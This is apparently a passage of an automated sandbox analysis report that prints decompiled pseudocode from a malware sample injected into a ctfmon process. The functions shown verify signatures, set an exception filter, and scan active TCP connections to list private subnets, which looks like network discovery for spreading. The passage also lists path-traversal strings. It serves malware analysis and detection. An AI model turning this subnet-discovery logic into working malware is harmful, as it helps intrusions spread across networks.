                                                0x00000000
                                                0x0096f969
                                                0x0096f969
                                                0x0096f972
                                                0x0096f978
                                                0x0096f97a
                                                0x0096f97d
                                                0x0096f981
                                                0x0096f920
                                                0x00000000
                                                0x00000000
                                                0x0096f983
                                                0x0096f981
                                                0x00000000
                                                0x0096f967
                                                0x0096f960
                                                0x0096f962
                                                0x0096f962
                                                0x00000000
                                                0x0096f962
                                                0x0096f924
                                                0x0096faa3
                                                0x0096faa3
                                                0x0096faa5
                                                0x0096faa8
                                                0x0096faad
                                                0x0096faad
                                                0x0096fac3
                                                0x0096facc
                                                0x0096fad5
                                                0x0096fadf
                                                0x00000000
                                                0x0096fadf
                                                0x0096f6f1
                                                0x0096f6f2
                                                0x0096f6f7
                                                0x00000000
                                                0x0096f6f7
                                                0x0096f6ef
                                                0x0096f690
                                                0x0096f696
                                                0x0096f69f
                                                0x0096f6a9
                                                0x0096f6a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096f53b
                                                0x0096f53e
                                                0x0096f56a
                                                0x0096f56f
                                                0x0096f573
                                                0x0096f577
                                                0x0096f581
                                                0x0096f58b
                                                0x0096f595
                                                0x0096f59f
                                                0x0096f5a9
                                                0x0096f5b3
                                                0x0096f5bd
                                                0x0096f5c7
                                                0x0096f5d2
                                                0x0096f5db
                                                0x0096f5e5
                                                0x0096f540
                                                0x0096f54c
                                                0x0096f54f
                                                0x0096f562
                                                0x0096f562
                                                0x0096f53e
                                                0x0096f539
                                                0x0096f51b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$/LU5/$\../$\..\
                                                • API String ID: 0-377722686
                                                • Opcode ID: 06f532405b0440f305a27c5e53877c8b207e6ae2183dba2c672591ff46ac9a4a
                                                • Instruction ID: 2aa745b3fd156db1e37c1a6955bf1c465264fb2e0c9ff012382bb4c222c7a978
                                                • Opcode Fuzzy Hash: 06f532405b0440f305a27c5e53877c8b207e6ae2183dba2c672591ff46ac9a4a
                                                • Instruction Fuzzy Hash: 4602D8715043418FC724CF28D4A17AABBE1BFD5314F188A7DE8DA8B282D775E909CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964920 Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 530 964920-96493d CryptAcquireContextA 531 964945-964962 CryptImportKey 530->531 532 96493f-964944 530->532 531->532 533 964964-96497c CryptCreateHash 531->533 533->532 534 96497e-964991 CryptHashData 533->534 534->532 535 964993-9649be CryptVerifySignatureA 534->535 536 9649c7-9649cc 535->536 537 9649c0-9649c1 CryptDestroyHash 535->537 538 9649d7-9649dd 536->538 539 9649ce-9649d1 CryptReleaseContext 536->539 537->536 539->538
                                                C-Code - Quality: 28%
                                                			E00964920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long* _v12;
				long* _v16;
				int _t16;
				int _t18;
				char* _t20;
				intOrPtr _t21;
				void* _t24;
				void* _t27;
				long* _t30;

				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t16 != 0) {
					_t18 = CryptImportKey(_v12, 0x990ce0, 0x94, 0, 0,  &_v16); // executed
					if(_t18 == 0) {
						goto L1;
					} else {
						_t20 =  &_v8;
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
						if(_t20 == 0) {
							goto L1;
						} else {
							__imp__CryptHashData(_v8, _a4, _a8, 0);
							if(_t20 == 0) {
								goto L1;
							} else {
								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
								_t21 = _v8;
								_t27 =  !=  ? 1 : 0;
								if(_t21 != 0) {
									__imp__CryptDestroyHash(_t21);
								}
								_t30 = _v12;
								if(_t30 != 0) {
									CryptReleaseContext(_t30, 0);
								}
								return _t27;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}













                                                0x00964935
                                                0x0096493d
                                                0x0096495a
                                                0x00964962
                                                0x00000000
                                                0x00964964
                                                0x00964964
                                                0x00964974
                                                0x0096497c
                                                0x00000000
                                                0x0096497e
                                                0x00964989
                                                0x00964991
                                                0x00000000
                                                0x00964993
                                                0x009649a6
                                                0x009649b1
                                                0x009649b9
                                                0x009649be
                                                0x009649c1
                                                0x009649c1
                                                0x009649c7
                                                0x009649cc
                                                0x009649d1
                                                0x009649d1
                                                0x009649dd
                                                0x009649dd
                                                0x00964991
                                                0x0096497c
                                                0x0096493f
                                                0x0096493f
                                                0x00964944
                                                0x00964944

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 00964935
                                                • CryptImportKey.ADVAPI32(00000000,00990CE0,00000094,00000000,00000000,?), ref: 0096495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00964974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00964989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 009649A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 009649C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009649D1
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 0589fda953823c4926ef38df66df0763a5dd48c16624c909ff39f51114adfbef
                                                • Instruction ID: 256fefe5c6e6d9839213a986f33dc403aef453e0a2eadbcbf98c3d65099c50d6
                                                • Opcode Fuzzy Hash: 0589fda953823c4926ef38df66df0763a5dd48c16624c909ff39f51114adfbef
                                                • Instruction Fuzzy Hash: BC213035B84308BBEF219FA0DC46FAE7BBDAB05B01F100054BA08E61E0D7719A14EB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009715D6 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E009715D6() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E009715E2); // executed
				return _t1;
			}




                                                0x009715db
                                                0x009715e1

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_000115E2,00971014), ref: 009715DB
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 671f0d3ad4fd27035adaa78a1e149df6077c1bef8ea6cf6fc579b51c244abf70
                                                • Instruction ID: 7c850f5a6cadfdd56d0e01d4716e365abcf13f31d0cb3aa0c04926e849e0d4bd
                                                • Opcode Fuzzy Hash: 671f0d3ad4fd27035adaa78a1e149df6077c1bef8ea6cf6fc579b51c244abf70
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00965200 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 399memorysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 965200-965255 Sleep call 973440 2 96525a-965284 GetProcessHeap HeapAlloc 0->2 3 96528a 2->3 4 9657bb-9657d6 call 970a5d 2->4 6 965290-9652ad GetTcpTable 3->6 8 9652af-9652d2 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 6->8 9 9652d8-9652ea GetTcpTable 6->9 8->4 8->9 10 9657b3-9657b9 GetProcessHeap HeapFree 9->10 11 9652f0-9652f8 9->11 10->4 12 965777-9657ab GetProcessHeap HeapFree Sleep GetProcessHeap HeapAlloc 11->12 13 9652fe-965307 11->13 12->6 15 9657b1 12->15 14 965310-96535d call 973440 call 965180 13->14 20 96535f-965362 14->20 21 965389-9653ab 14->21 15->4 24 965377-96537a 20->24 25 965364-965367 20->25 22 9653b1-9653ba 21->22 23 9653ad-9653af 21->23 30 9653c0-9653c5 22->30 29 9653c9-9653f7 call 965a00 call 966530 23->29 26 965741-965765 24->26 28 965380-965383 24->28 25->26 27 96536d-965370 25->27 26->14 34 96576b-965771 26->34 27->21 31 965372 27->31 28->21 28->26 38 96545b 29->38 39 9653f9-965403 29->39 30->30 32 9653c7 30->32 31->26 32->29 34->12 40 96545d-96546b 38->40 41 965407-965435 call 9651a0 39->41 42 965405 39->42 44 96546d-965475 call 965cf0 40->44 45 96547a-96547c 40->45 49 965437-96543f 41->49 50 96544f-965454 41->50 42->41 44->45 45->26 48 965482-9654a4 45->48 51 9654a6-9654a8 48->51 52 9654aa-9654b0 48->52 55 965446-96544a 49->55 56 965441-965444 49->56 50->40 57 965456 50->57 53 9654bc-965506 call 965a00 call 9664b0 51->53 54 9654b3-9654b8 52->54 64 96556a 53->64 65 965508-965512 53->65 54->54 58 9654ba 54->58 60 96544d 55->60 56->60 57->38 58->53 60->50 66 96556c-96556e 64->66 67 965516-965544 call 9651a0 65->67 68 965514 65->68 69 965574-965596 66->69 70 965600 66->70 79 965546-96554e 67->79 80 96555e-965563 67->80 68->67 73 96559c-9655a2 69->73 74 965598-96559a 69->74 72 965606 70->72 76 965608-965611 72->76 78 9655a5-9655aa 73->78 77 9655ae-9655fa call 965a00 call 9657e0 GetTickCount 74->77 82 965655-96565f 76->82 83 965613-965625 76->83 77->72 105 9655fc-9655fe 77->105 78->78 84 9655ac 78->84 86 965555-965559 79->86 87 965550-965553 79->87 80->66 81 965565 80->81 81->64 91 965682-965684 82->91 92 965661-965673 82->92 89 965627-965634 call 965cf0 83->89 90 96563a-96564e 83->90 84->77 88 96555c 86->88 87->88 88->80 89->90 90->82 91->26 96 96568a-9656ac 91->96 92->91 95 965675-96567d call 965cf0 92->95 95->91 100 9656b2-9656bb 96->100 101 9656ae-9656b0 96->101 103 9656c0-9656c5 100->103 104 9656c9-965705 call 965a00 call 9657e0 GetTickCount 101->104 103->103 106 9656c7 103->106 111 965707-96570f call 965cf0 104->111 112 965714-96573e call 96b4e0 104->112 105->76 106->104 111->112 112->26
                                                C-Code - Quality: 74%
                                                			E00965200(void* __ebx, void* __edi) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v148;
				intOrPtr _v152;
				long _v156;
				char _v172;
				intOrPtr _v176;
				long _v180;
				char _v196;
				intOrPtr _v200;
				long _v204;
				char _v220;
				signed int _v224;
				long _v228;
				void* _v232;
				signed int _v236;
				intOrPtr _v240;
				signed int* _v244;
				signed int _v248;
				void* __esi;
				signed int _t127;
				signed int _t128;
				long* _t136;
				long* _t137;
				void* _t143;
				signed int _t155;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				signed int _t164;
				signed int _t168;
				intOrPtr* _t171;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr _t179;
				intOrPtr _t183;
				intOrPtr _t186;
				signed int _t189;
				signed int _t193;
				intOrPtr* _t195;
				long _t196;
				signed int _t200;
				signed int _t207;
				void* _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int* _t224;
				intOrPtr* _t225;
				signed int _t226;
				intOrPtr* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t233;
				intOrPtr* _t237;
				signed int _t238;
				long _t242;
				long _t245;
				void* _t247;
				intOrPtr _t250;
				intOrPtr _t251;
				intOrPtr* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				signed int _t257;
				void* _t258;
				void* _t260;

				_push(0xffffffff);
				_push(E0098456F);
				_push( *[fs:0x0]);
				_t127 =  *0x98f008; // 0x35554c2f
				_t128 = _t127 ^ _t257;
				_v20 = _t128;
				_push(__edi);
				_push(_t128);
				 *[fs:0x0] =  &_v16;
				_v224 = 0;
				_v236 = 0;
				Sleep(0x1388); // executed
				E00973440(__edi,  &_v148, 0, 0x80);
				_t253 = GetProcessHeap;
				_t260 = _t258 - 0xe8 + 0xc;
				_v228 = 0;
				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
				_v232 = _t215;
				if(_t215 == 0) {
					L80:
					 *[fs:0x0] = _v16;
					_pop(_t254);
					return E00970A5D(_v20 ^ _t257, _t254);
				}
				_t250 = HeapFree;
				do {
					_t136 =  &_v228;
					_v228 = 0x18;
					__imp__GetTcpTable(_t215, _t136, 1);
					if(_t136 != 0x7a) {
						L4:
						_t137 =  &_v228;
						__imp__GetTcpTable(_t215, _t137, 1);
						if(_t137 != 0) {
							HeapFree(GetProcessHeap(), 0, _t215);
							goto L80;
						}
						_v240 = _t137;
						if( *_t215 <= _t137) {
							goto L77;
						}
						_t14 = _t215 + 0x10; // 0x10
						_t224 = _t14;
						_v244 = _t224;
						asm("o16 nop [eax+eax]");
						do {
							_t217 =  *_t224;
							_v248 = _t217;
							E00973440(_t250,  &_v148, 0, 0x80);
							_push(_t217 >> 0x00000010 & 0x000000ff);
							_push(_t217 >> 0x00000008 & 0x000000ff);
							E00965180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
							_t260 = _t260 + 0x24;
							if(_t217 == 0xa) {
								L14:
								__eflags = _v148;
								_v152 = 0xf;
								_v156 = 0;
								_v172 = 0;
								if(_v148 != 0) {
									_t225 =  &_v148;
									_t24 = _t225 + 1; // 0x1
									_t246 = _t24;
									asm("o16 nop [eax+eax]");
									do {
										_t155 =  *_t225;
										_t225 = _t225 + 1;
										__eflags = _t155;
									} while (_t155 != 0);
									_t226 = _t225 - _t246;
									__eflags = _t226;
									L19:
									_push(_t226);
									_push( &_v148);
									E00965A00(_t217,  &_v172, _t250, _t253);
									_t250 =  *0x996a8c;
									_t255 = E00966530( &_v172,  &_v172);
									_t160 =  *0x996a8c;
									__eflags = _t255 - _t160;
									if(_t255 == _t160) {
										L29:
										_t253 = _t160;
										L30:
										_t161 = _v152;
										__eflags = _t253 - _t250;
										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
										__eflags = _t161 - 0x10;
										if(_t161 >= 0x10) {
											__eflags = _t161 + 1;
											E00965CF0(_t218, _t246, _t250, _v172, _t161 + 1);
										}
										__eflags = _t218;
										if(_t218 == 0) {
											goto L75;
										} else {
											__eflags = _v148;
											_v152 = 0xf;
											_v156 = 0;
											_v172 = 0;
											if(_v148 != 0) {
												_t229 =  &_v148;
												_t50 = _t229 + 1; // 0x1
												_t246 = _t50;
												do {
													_t164 =  *_t229;
													_t229 = _t229 + 1;
													__eflags = _t164;
												} while (_t164 != 0);
												_t230 = _t229 - _t246;
												__eflags = _t230;
												L38:
												_push(_t230);
												_push( &_v148);
												E00965A00(_t218,  &_v172, _t250, _t253);
												_v8 = 0;
												_t251 =  *0x996a54;
												_t168 = _v224 | 0x00000001;
												_v224 = _t168;
												_v236 = _t168;
												_t256 = E009664B0( &_v172,  &_v172);
												_t171 =  *0x996a54;
												__eflags = _t256 - _t171;
												if(_t256 == _t171) {
													L48:
													_t253 = _t171;
													L49:
													__eflags = _t253 - _t251;
													if(_t253 == _t251) {
														_t250 = GetTickCount;
														L58:
														_t219 = 1;
														L59:
														_t232 = _v224;
														__eflags = _t232 & 0x00000002;
														if((_t232 & 0x00000002) != 0) {
															_t186 = _v176;
															_t232 = _t232 & 0xfffffffd;
															_v224 = _t232;
															__eflags = _t186 - 0x10;
															if(_t186 >= 0x10) {
																__eflags = _t186 + 1;
																E00965CF0(_t219, _t246, _t250, _v196, _t186 + 1);
																_t232 = _v224;
															}
															_v176 = 0xf;
															_v180 = 0;
															_v196 = 0;
														}
														_v8 = 0xffffffff;
														__eflags = _t232 & 0x00000001;
														if((_t232 & 0x00000001) != 0) {
															_t183 = _v152;
															_v224 = _t232 & 0xfffffffe;
															__eflags = _t183 - 0x10;
															if(_t183 >= 0x10) {
																__eflags = _t183 + 1;
																E00965CF0(_t219, _t246, _t250, _v172, _t183 + 1);
															}
														}
														__eflags = _t219;
														if(_t219 == 0) {
															goto L75;
														} else {
															__eflags = _v148;
															_v200 = 0xf;
															_v204 = 0;
															_v220 = 0;
															if(_v148 != 0) {
																_t172 =  &_v148;
																_t105 = _t172 + 1; // 0x1
																_t247 = _t105;
																do {
																	_t233 =  *_t172;
																	_t172 = _t172 + 1;
																	__eflags = _t233;
																} while (_t233 != 0);
																_t173 = _t172 - _t247;
																__eflags = _t173;
																L72:
																_push(_t173);
																_push( &_v148);
																E00965A00(_t219,  &_v220, _t250, _t253);
																_v8 = 2;
																_t253 = E009657E0( &_v220,  &_v220);
																 *_t253 = GetTickCount();
																_v8 = 0xffffffff;
																_t179 = _v200;
																__eflags = _t179 - 0x10;
																if(_t179 >= 0x10) {
																	__eflags = _t179 + 1;
																	E00965CF0(_t219, _t246, _t250, _v220, _t179 + 1);
																}
																_t246 = 0;
																__eflags = 0;
																_v200 = 0xf;
																_v204 = 0;
																_v220 = 0;
																E0096B4E0(_t219,  &_v248, 0, _t250, 1);
																_t260 = _t260 + 4;
																goto L75;
															}
															_t173 = 0;
															goto L72;
														}
													}
													__eflags = _v148;
													_v176 = 0xf;
													_v180 = 0;
													_v196 = 0;
													if(_v148 != 0) {
														_t237 =  &_v148;
														_t76 = _t237 + 1; // 0x1
														_t246 = _t76;
														do {
															_t189 =  *_t237;
															_t237 = _t237 + 1;
															__eflags = _t189;
														} while (_t189 != 0);
														_t238 = _t237 - _t246;
														__eflags = _t238;
														L55:
														_push(_t238);
														_push( &_v148);
														E00965A00(_t218,  &_v196, _t251, _t253);
														_v8 = 1;
														_t193 = _v224 | 0x00000002;
														_v224 = _t193;
														_v236 = _t193;
														_t195 = E009657E0( &_v196,  &_v196);
														_t250 = GetTickCount;
														_t253 = _t195;
														_t196 = GetTickCount();
														__eflags = _t196 -  *_t253 - 0x493e0;
														if(_t196 -  *_t253 > 0x493e0) {
															goto L58;
														}
														_t219 = 0;
														goto L59;
													}
													_t238 = 0;
													goto L55;
												}
												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
												_t59 = _t256 + 0x10; // 0x10
												_t246 = _t59;
												_t218 =  *(_t246 + 0x10);
												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
													_t246 =  *_t246;
												}
												__eflags = _v152 - 0x10;
												_t241 =  >=  ? _v172 :  &_v172;
												__eflags = _v156 - _t218;
												_t199 =  <  ? _v156 : _t218;
												_t200 = E009651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
												_t260 = _t260 + 4;
												__eflags = _t200;
												if(__eflags == 0) {
													_t242 = _v156;
													__eflags = _t242 - _t218;
													if(_t242 >= _t218) {
														__eflags = _t242 - _t218;
														_t68 = _t242 != _t218;
														__eflags = _t68;
														_t200 = 0 | _t68;
													} else {
														_t200 = _t200 | 0xffffffff;
													}
													__eflags = _t200;
												}
												if(__eflags == 0) {
													goto L49;
												} else {
													_t171 =  *0x996a54;
													goto L48;
												}
											}
											_t230 = 0;
											goto L38;
										}
									}
									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
									_t29 = _t255 + 0x10; // 0x10
									_t246 = _t29;
									_t217 =  *(_t246 + 0x10);
									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
										_t246 =  *_t246;
									}
									__eflags = _v152 - 0x10;
									_t244 =  >=  ? _v172 :  &_v172;
									__eflags = _v156 - _t217;
									_t206 =  <  ? _v156 : _t217;
									_t207 = E009651A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
									_t260 = _t260 + 4;
									__eflags = _t207;
									if(__eflags == 0) {
										_t245 = _v156;
										__eflags = _t245 - _t217;
										if(_t245 >= _t217) {
											__eflags = _t245 - _t217;
											_t38 = _t245 != _t217;
											__eflags = _t38;
											_t207 = 0 | _t38;
										} else {
											_t207 = _t207 | 0xffffffff;
										}
										__eflags = _t207;
									}
									if(__eflags == 0) {
										goto L30;
									} else {
										_t160 =  *0x996a8c;
										goto L29;
									}
								}
								_t226 = 0;
								goto L19;
							}
							if(_t217 != 0xac) {
								__eflags = _t217 - 0xc0;
								if(_t217 != 0xc0) {
									goto L75;
								}
								__eflags = _t217 - 0xa8;
								if(_t217 != 0xa8) {
									goto L75;
								}
								goto L14;
							}
							if(_t217 < 0x10) {
								goto L75;
							}
							if(_t217 <= 0x1f) {
								goto L14;
							}
							L75:
							_t215 = _v232;
							_t163 = _v240 + 1;
							_t224 =  &(_v244[5]);
							_v240 = _t163;
							_v244 = _t224;
						} while (_t163 <  *_t215);
						_t253 = GetProcessHeap;
						_t250 = HeapFree;
						goto L77;
					}
					HeapFree(GetProcessHeap(), 0, _t215);
					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
					_v232 = _t215;
					if(_t215 == 0) {
						goto L80;
					}
					goto L4;
					L77:
					HeapFree(GetProcessHeap(), 0, _t215);
					Sleep(0x1388);
					_v228 = 0;
					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
					_t215 = _t143;
					_v232 = _t143;
				} while (_t215 != 0);
				goto L80;
			}








































































                                                0x00965203
                                                0x00965205
                                                0x00965210
                                                0x00965217
                                                0x0096521c
                                                0x0096521e
                                                0x00965223
                                                0x00965224
                                                0x00965228
                                                0x00965235
                                                0x0096523b
                                                0x00965241
                                                0x00965255
                                                0x0096525a
                                                0x00965260
                                                0x00965263
                                                0x0096527a
                                                0x0096527c
                                                0x00965284
                                                0x009657bb
                                                0x009657be
                                                0x009657c7
                                                0x009657d6
                                                0x009657d6
                                                0x0096528a
                                                0x00965290
                                                0x00965292
                                                0x00965298
                                                0x009652a4
                                                0x009652ad
                                                0x009652d8
                                                0x009652da
                                                0x009652e2
                                                0x009652ea
                                                0x009657b9
                                                0x00000000
                                                0x009657b9
                                                0x009652f0
                                                0x009652f8
                                                0x00000000
                                                0x00000000
                                                0x009652fe
                                                0x009652fe
                                                0x00965301
                                                0x00965307
                                                0x00965310
                                                0x00965310
                                                0x00965320
                                                0x00965326
                                                0x00965333
                                                0x0096533c
                                                0x00965352
                                                0x00965357
                                                0x0096535d
                                                0x00965389
                                                0x00965389
                                                0x00965390
                                                0x0096539a
                                                0x009653a4
                                                0x009653ab
                                                0x009653b1
                                                0x009653b7
                                                0x009653b7
                                                0x009653ba
                                                0x009653c0
                                                0x009653c0
                                                0x009653c2
                                                0x009653c3
                                                0x009653c3
                                                0x009653c7
                                                0x009653c7
                                                0x009653c9
                                                0x009653c9
                                                0x009653d0
                                                0x009653d7
                                                0x009653dc
                                                0x009653ee
                                                0x009653f0
                                                0x009653f5
                                                0x009653f7
                                                0x0096545b
                                                0x0096545b
                                                0x0096545d
                                                0x0096545d
                                                0x00965463
                                                0x00965465
                                                0x00965468
                                                0x0096546b
                                                0x0096546d
                                                0x00965475
                                                0x00965475
                                                0x0096547a
                                                0x0096547c
                                                0x00000000
                                                0x00965482
                                                0x00965482
                                                0x00965489
                                                0x00965493
                                                0x0096549d
                                                0x009654a4
                                                0x009654aa
                                                0x009654b0
                                                0x009654b0
                                                0x009654b3
                                                0x009654b3
                                                0x009654b5
                                                0x009654b6
                                                0x009654b6
                                                0x009654ba
                                                0x009654ba
                                                0x009654bc
                                                0x009654bc
                                                0x009654c3
                                                0x009654ca
                                                0x009654cf
                                                0x009654dc
                                                0x009654e2
                                                0x009654e5
                                                0x009654eb
                                                0x009654fd
                                                0x009654ff
                                                0x00965504
                                                0x00965506
                                                0x0096556a
                                                0x0096556a
                                                0x0096556c
                                                0x0096556c
                                                0x0096556e
                                                0x00965600
                                                0x00965606
                                                0x00965606
                                                0x00965608
                                                0x00965608
                                                0x0096560e
                                                0x00965611
                                                0x00965613
                                                0x00965619
                                                0x0096561c
                                                0x00965622
                                                0x00965625
                                                0x00965627
                                                0x0096562f
                                                0x00965634
                                                0x00965634
                                                0x0096563a
                                                0x00965644
                                                0x0096564e
                                                0x0096564e
                                                0x00965655
                                                0x0096565c
                                                0x0096565f
                                                0x00965661
                                                0x0096566a
                                                0x00965670
                                                0x00965673
                                                0x00965675
                                                0x0096567d
                                                0x0096567d
                                                0x00965673
                                                0x00965682
                                                0x00965684
                                                0x00000000
                                                0x0096568a
                                                0x0096568a
                                                0x00965691
                                                0x0096569b
                                                0x009656a5
                                                0x009656ac
                                                0x009656b2
                                                0x009656b8
                                                0x009656b8
                                                0x009656c0
                                                0x009656c0
                                                0x009656c2
                                                0x009656c3
                                                0x009656c3
                                                0x009656c7
                                                0x009656c7
                                                0x009656c9
                                                0x009656c9
                                                0x009656d0
                                                0x009656d7
                                                0x009656e2
                                                0x009656ef
                                                0x009656f3
                                                0x009656f5
                                                0x009656fc
                                                0x00965702
                                                0x00965705
                                                0x00965707
                                                0x0096570f
                                                0x0096570f
                                                0x00965716
                                                0x00965716
                                                0x00965718
                                                0x00965728
                                                0x00965732
                                                0x00965739
                                                0x0096573e
                                                0x00000000
                                                0x0096573e
                                                0x009656ae
                                                0x00000000
                                                0x009656ae
                                                0x00965684
                                                0x00965574
                                                0x0096557b
                                                0x00965585
                                                0x0096558f
                                                0x00965596
                                                0x0096559c
                                                0x009655a2
                                                0x009655a2
                                                0x009655a5
                                                0x009655a5
                                                0x009655a7
                                                0x009655a8
                                                0x009655a8
                                                0x009655ac
                                                0x009655ac
                                                0x009655ae
                                                0x009655ae
                                                0x009655b5
                                                0x009655bc
                                                0x009655c1
                                                0x009655ce
                                                0x009655d1
                                                0x009655d7
                                                0x009655e4
                                                0x009655e9
                                                0x009655ef
                                                0x009655f1
                                                0x009655f5
                                                0x009655fa
                                                0x00000000
                                                0x00000000
                                                0x009655fc
                                                0x00000000
                                                0x009655fc
                                                0x00965598
                                                0x00000000
                                                0x00965598
                                                0x00965508
                                                0x0096550c
                                                0x0096550c
                                                0x0096550f
                                                0x00965512
                                                0x00965514
                                                0x00965514
                                                0x00965516
                                                0x00965525
                                                0x0096552c
                                                0x00965532
                                                0x0096553a
                                                0x0096553f
                                                0x00965542
                                                0x00965544
                                                0x00965546
                                                0x0096554c
                                                0x0096554e
                                                0x00965557
                                                0x00965559
                                                0x00965559
                                                0x00965559
                                                0x00965550
                                                0x00965550
                                                0x00965550
                                                0x0096555c
                                                0x0096555c
                                                0x00965563
                                                0x00000000
                                                0x00965565
                                                0x00965565
                                                0x00000000
                                                0x00965565
                                                0x00965563
                                                0x009654a6
                                                0x00000000
                                                0x009654a6
                                                0x0096547c
                                                0x009653f9
                                                0x009653fd
                                                0x009653fd
                                                0x00965400
                                                0x00965403
                                                0x00965405
                                                0x00965405
                                                0x00965407
                                                0x00965416
                                                0x0096541d
                                                0x00965423
                                                0x0096542b
                                                0x00965430
                                                0x00965433
                                                0x00965435
                                                0x00965437
                                                0x0096543d
                                                0x0096543f
                                                0x00965448
                                                0x0096544a
                                                0x0096544a
                                                0x0096544a
                                                0x00965441
                                                0x00965441
                                                0x00965441
                                                0x0096544d
                                                0x0096544d
                                                0x00965454
                                                0x00000000
                                                0x00965456
                                                0x00965456
                                                0x00000000
                                                0x00965456
                                                0x00965454
                                                0x009653ad
                                                0x00000000
                                                0x009653ad
                                                0x00965362
                                                0x00965377
                                                0x0096537a
                                                0x00000000
                                                0x00000000
                                                0x00965380
                                                0x00965383
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00965383
                                                0x00965367
                                                0x00000000
                                                0x00000000
                                                0x00965370
                                                0x00000000
                                                0x00000000
                                                0x00965741
                                                0x00965747
                                                0x0096574d
                                                0x00965754
                                                0x00965757
                                                0x0096575d
                                                0x00965763
                                                0x0096576b
                                                0x00965771
                                                0x00000000
                                                0x00965771
                                                0x009652b5
                                                0x009652c8
                                                0x009652ca
                                                0x009652d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00965777
                                                0x0096577d
                                                0x00965784
                                                0x0096578e
                                                0x0096579b
                                                0x009657a1
                                                0x009657a3
                                                0x009657a9
                                                0x00000000

                                                APIs
                                                • Sleep.KERNELBASE(00001388,35554C2F), ref: 00965241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 00965271
                                                • HeapAlloc.KERNEL32(00000000), ref: 00965274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 009652A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009652B2
                                                • HeapFree.KERNEL32(00000000), ref: 009652B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 009652BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 009652C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 009652E2
                                                • GetTickCount.KERNEL32 ref: 009655F1
                                                • GetTickCount.KERNEL32 ref: 009656F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0096577A
                                                • HeapFree.KERNEL32(00000000), ref: 0096577D
                                                • Sleep.KERNEL32(00001388), ref: 00965784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 00965798
                                                • HeapAlloc.KERNEL32(00000000), ref: 0096579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009657B6
                                                • HeapFree.KERNEL32(00000000), ref: 009657B9
                                                Strings
